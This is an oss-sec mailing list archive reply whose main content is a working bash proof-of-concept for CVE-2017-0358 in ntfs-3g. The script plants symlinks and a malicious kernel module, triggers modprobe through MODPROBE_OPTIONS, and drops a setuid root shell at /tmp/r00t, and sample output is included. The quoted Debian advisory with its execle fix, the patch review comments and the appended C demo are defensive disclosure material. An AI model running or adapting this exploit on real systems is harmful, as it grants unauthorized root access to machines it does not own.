oss-sec mailing list archives
Re: CVE-2017-0358 ntfs-3g: modprobe influence vulnerability via environment variables
From: Kristian Erik Hermansen <kristian.hermansen () gmail com>
Date: Fri, 3 Feb 2017 23:14:16 -0800
#!/bin/bash
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "@ CVE-2017-0359, PoC by Kristian Erik Hermansen @"
echo "@ ntfs-3g local privilege escalation to root @"
echo "@ Credits to Google Project Zero @"
echo "@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @"
echo "@ Tested: Debian 9 (Stretch) @"
echo "@ Date: 2017-02-03 @"
echo "@ Link: https://goo.gl/A9I8Vq @"
echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
echo "[*] Gathering environment info ..."
cwd="$(pwd)"
un="$(uname -r)"
dlm="$(pwd)/lib/modules"
dkf="$(pwd)/kernel/fs"
echo "[*] Creating kernel hijack directories ..."
mkdir -p "${dlm}"
mkdir -p "${dkf}"
echo "[*] Forging symlinks ..."
ln -sf "${cwd}" "${dlm}/${un}"
ln -sf "${cwd}" "${dkf}/fuse"
ln -sf cve_2017_0358.ko fuse.ko
echo "[*] Pulling in deps ... "
echo "[*] Building kernel module ... "
cat << 'EOF' > cve_2017_0358.c
#include <linux/module.h>
MODULE_LICENSE("CC");
MODULE_AUTHOR("kristian erik hermansen <kristian.hermansen+CVE-2017-0358 () gmail com>");
MODULE_DESCRIPTION("PoC for CVE-2017-0358 from Google Project Zero");
int init_module(void) {
    printk(KERN_INFO "[!] Exploited CVE-2017-0358 successfully; may want to patch your system!\n");
    char *envp[] = { "HOME=/tmp", NULL };
    char *argv[] = { "/bin/sh", "-c", "/bin/cp /bin/sh /tmp/r00t; /bin/chmod u+s /tmp/r00t", NULL };
    call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
    char *argvv[] = { "/bin/sh", "-c", "/sbin/rmmod cve_2017_0358", NULL };
    call_usermodehelper(argv[0], argvv, envp, UMH_WAIT_EXEC);
    return 0;
}
void cleanup_module(void) {
    printk(KERN_INFO "[*] CVE-2017-0358 exploit unloading ...\n");
}
EOF
cat << 'EOF' > Makefile
obj-m += cve_2017_0358.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
EOF
make 1>/dev/null 2>/dev/null || echo "[-] FAILED: your need make / build tools"
cp "/lib/modules/${un}/modules.dep.bin" . || echo "[-] FAILED: linux-image location non-default?"
MODPROBE_OPTIONS="-v -d ${cwd}" ntfs-3g /dev/null /dev/null 1>/dev/null 2>/dev/null
/tmp/r00t -c 'whoami' | egrep -q 'root' && echo "[+] SUCCESS: You have root. Don't be evil :)"
/tmp/r00t
echo << 'EOF'
$ whoami
user
$ ./cve-2017-0358.sh
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ CVE-2017-0359, PoC by Kristian Erik Hermansen @
@ ntfs-3g local privilege escalation to root @
@ Credits to Google Project Zero @
@ Affects: Debian 9/8/7, Ubuntu, Gentoo, others @
@ Tested: Debian 9 (Stretch) @
@ Date: 2017-02-03 @
@ Link: https://goo.gl/A9I8Vq @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
[*] Gathering environment info ...
[*] Creating kernel hijack directories ...
[*] Forging symlinks ...
[*] Pulling in deps ...
[*] Building kernel module ...
[+] SUCCESS: You have root. Don't be evil :)
# whoami
root
EOF

On Tue, Jan 31, 2017 at 10:44 PM, Laszlo Boszormenyi (GCS) <gcs () debian org> wrote:
Hi,

Jann Horn, Project Zero (Google) discovered that ntfs-3g, a read-write NTFS driver for FUSE, does not scrub the environment before executing modprobe to load the fuse module. This influences the behavior of modprobe (MODPROBE_OPTIONS environment variable, --config and --dirname options), potentially allowing for local root privilege escalation if ntfs-3g is installed setuid. This is the case for Debian, Ubuntu and probably Gentoo. This problem has been in the source since 2008, maybe before.

The fix is easy: use execle instead of execl and pass NULL as environment variables.

-- cut --
--- ntfs-3g/src/lowntfs-3g.c.ref 2016-12-31 08:56:59.011749600 +0100 +++ ntfs-3g/src/lowntfs-3g.c 2017-01-05 14:41:52.041473700 +0100 @@ -4291,13 +4291,14 @@ struct stat st; pid_t pid; const char *cmd = "/sbin/modprobe"; + char *env = (char*)NULL; struct timespec req = { 0, 100000000 }; /* 100 msec */ fuse_fstype fstype; if (!stat(cmd, &st) && !geteuid()) { pid = fork(); if (!pid) { - execl(cmd, cmd, "fuse", NULL); + execle(cmd, cmd, "fuse", NULL, &env); _exit(1); } else if (pid != -1) waitpid(pid, NULL, 0); --- ntfs-3g/src/ntfs-3g.c.ref 2016-12-31 08:56:59.022518700 +0100 +++ ntfs-3g/src/ntfs-3g.c 2017-01-05 15:45:45.912499400 +0100 @@ -3885,13 +3885,14 @@ struct stat st; pid_t pid; const char *cmd = "/sbin/modprobe"; + char *env = (char*)NULL; struct timespec req = { 0, 100000000 }; /* 100 msec */ fuse_fstype fstype; if (!stat(cmd, &st) && !geteuid()) { pid = fork(); if (!pid) { - execl(cmd, cmd, "fuse", NULL); + execle(cmd, cmd, "fuse", NULL, &env); _exit(1); } else if (pid != -1) waitpid(pid, NULL, 0);
-- cut --

CVE-2017-0358 is assigned to this issue by Salvatore Bonaccorso, Debian Security Team.

Regards,
Laszlo/GCS
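Review bot: in the lowntfs-3g.c hunk, `+ char *env = (char*)NULL;` combined with `execle(cmd, cmd, "fuse", NULL, &env)` passes a pointer to a single NULL pointer as envp, which is a valid zero-length environment but an unusual idiom; `char *const env[] = { NULL };` followed by `execle(cmd, cmd, "fuse", NULL, env)` expresses the same thing more plainly. The hunk also adds no comment saying why the environment is dropped; a one-line note that modprobe honours MODPROBE_OPTIONS (and its --config / --dirname options) from the caller's environment would stop a future cleanup from reverting this to execl.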
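Review bot: the ntfs-3g.c hunk repeats the lowntfs-3g.c change line for line (same `env` declaration, same `execle` call around the same `!stat(cmd, &st) && !geteuid()` guard), so the modprobe spawn now lives in two copies that can drift apart; moving the fork/execle/waitpid sequence into one shared helper used by both binaries would keep the environment scrubbing in a single place. Because `cmd` is the absolute path /sbin/modprobe, the empty environment costs nothing here: no PATH lookup is needed.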
--
Regards,
Kristian Erik Hermansen
https://www.linkedin.com/in/kristianhermansen
https://profiles.google.com/kristianerikhermansen
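An added example, not ntfs-3g code and not part of this thread, contrasting the environment a helper inherits through execl with the empty environment it receives through execle as in the quoted fix. It assumes /bin/sh is present and uses a constructed MODPROBE_OPTIONS value; the child only reports whether it can see that variable, so the difference between the two spawn paths is directly observable.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

/* Spawn /bin/sh, which exits 0 only if MODPROBE_OPTIONS is set in its
 * environment.  With scrub_env == 0 the child inherits the caller's
 * environment (execl, the pre-fix behaviour); with scrub_env != 0 it gets
 * an empty envp (execle, the fixed behaviour).
 * Returns 1 if the child saw the variable, 0 if not, -1 on error. */
int child_sees_modprobe_options(int scrub_env)
{
    const char *cmd = "/bin/sh";
    const char *probe = "test -n \"$MODPROBE_OPTIONS\"";
    char *env = (char *)NULL;   /* &env is a zero-length envp, as in the patch */
    pid_t pid = fork();
    if (pid == -1)
        return -1;
    if (pid == 0) {
        if (scrub_env)
            execle(cmd, cmd, "-c", probe, (char *)NULL, &env); /* hardened */
        else
            execl(cmd, cmd, "-c", probe, (char *)NULL);        /* inherits env */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) == -1 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 0 ? 1 : 0;
}

/* Plant a constructed MODPROBE_OPTIONS value (a path that need not exist)
 * in our own environment, then compare the two spawn paths.
 * Returns 1 when execl leaks the variable and execle does not. */
int demo(void)
{
    setenv("MODPROBE_OPTIONS", "-v -d /constructed/attacker/dir", 1);
    int leaked = child_sees_modprobe_options(0);
    int scrubbed = child_sees_modprobe_options(1);
    printf("execl : child sees MODPROBE_OPTIONS = %d\n", leaked);
    printf("execle: child sees MODPROBE_OPTIONS = %d\n", scrubbed);
    return leaked == 1 && scrubbed == 0;
}

int main(void)
{
    return demo() ? 0 : 1;
}
```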
Attachment:
cve-2017-0358.sh.txt